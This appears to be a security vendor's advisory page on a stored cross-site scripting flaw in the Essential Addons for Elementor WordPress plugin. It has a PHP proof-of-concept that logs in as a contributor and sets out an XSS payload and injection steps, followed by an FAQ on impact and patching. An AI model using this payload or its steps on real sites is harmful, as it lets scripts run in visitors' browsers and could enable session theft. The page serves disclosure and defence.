You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-69092 - Essential Addons for Elementor <= 6.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting

<?php
/**
 * Proof of Concept for CVE-2025-69092
 * This script demonstrates stored XSS via the Event Calendar widget's details button text field.
 * Requires contributor-level WordPress credentials.
 */

$target_url = 'https://vulnerable-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';

// Malicious payload to inject into the Event Details Button Text field
$payload = '"><script>alert(`Atomic Edge Research - XSS via ${document.domain}`)</script>';

// Initialize cURL session
$ch = curl_init();

// Step 1: Authenticate and get WordPress nonce
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-login.php',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true
]);

$response = curl_exec($ch);

// Step 2: Create a new page with Elementor
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/post-new.php?post_type=page',
    CURLOPT_POST => false
]);

$response = curl_exec($ch);

// Extract nonce for Elementor AJAX (simplified - real implementation would parse HTML)
// In a real attack, the attacker would use the Elementor editor UI directly
// This PoC shows the vulnerable parameter and payload structure

echo "Vulnerable Parameter: eael_event_details_textn";
echo "Payload: " . htmlspecialchars($payload) . "n";
echo "nAttack Vector:n";
echo "1. Authenticate as contributor usern";
echo "2. Create/edit page with Elementorn";
echo "3. Add Essential Addons 'Event Calendar' widgetn";
echo "4. Set 'Event Details Button Text' to: " . htmlspecialchars($payload) . "n";
echo "5. Save page - XSS payload is stored in databasen";
echo "6. Any user viewing the page executes the malicious scriptn";

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-69092?
Overview of the vulnerability
CVE-2025-69092 is a stored cross-site scripting (XSS) vulnerability found in the Essential Addons for Elementor plugin for WordPress, affecting versions up to and including 6.5.3. It allows authenticated users with contributor-level access or higher to inject malicious scripts that execute when other users view compromised pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in multiple plugin components. Attackers can exploit it by injecting malicious JavaScript into specific widget settings, which is then stored and executed in the context of users viewing the affected pages.
Who is affected by this vulnerability?
Identifying impacted users
WordPress sites using the Essential Addons for Elementor plugin version 6.5.3 or earlier are affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability, potentially impacting site administrators and regular users who view compromised content.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify the version of the Essential Addons for Elementor plugin installed. If it is version 6.5.3 or earlier, your site is at risk. Additionally, review user roles and permissions to identify contributors and above who may have the ability to exploit this vulnerability.
What should I do to fix this vulnerability?
Mitigation steps
The vulnerability is patched in version 6.5.4 of the Essential Addons for Elementor plugin. It is recommended to update the plugin to the latest version immediately to mitigate the risk of exploitation.
What does the CVSS score of 6.4 indicate?
Understanding severity levels
A CVSS score of 6.4 indicates a medium severity level for this vulnerability. This means that while it is not the most critical type of vulnerability, it can still pose a significant risk, especially if exploited by unauthorized users.
What are the practical risks associated with this vulnerability?
Potential impact on websites
If exploited, this vulnerability can lead to stored XSS attacks, allowing attackers to execute scripts that could steal session cookies, deface websites, or redirect users to malicious sites. This can compromise user data and site integrity.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept illustrates how an authenticated attacker can inject a malicious payload into the Event Calendar widget’s settings. This payload is then stored and executed when users access the affected page, demonstrating the potential impact of the vulnerability.
What are the key vulnerable components identified?
Specific areas of concern
Key vulnerable components include the Event_Calendar element’s data-detailsButtonText attribute, the Login_Register element’s Cloudflare Turnstile data attributes, and the Image_Masking extension’s style block generation. These components failed to properly escape user-controlled data.
How can I further secure my WordPress site against such vulnerabilities?
Best practices for security
To enhance security, regularly update all plugins and themes, use strong user role management, and implement security plugins that can monitor and block potential threats. Additionally, consider conducting regular security audits.
Is there a way to test for this vulnerability on my site?
Testing for vulnerabilities
Yes, security professionals can use testing tools or scripts to simulate an attack based on the proof of concept. However, ensure you have permission and follow ethical guidelines when testing on any live site.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Essential Addons for Elementor plugin until a patch can be applied. Additionally, review user roles to limit contributor access and monitor for any unusual activity.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations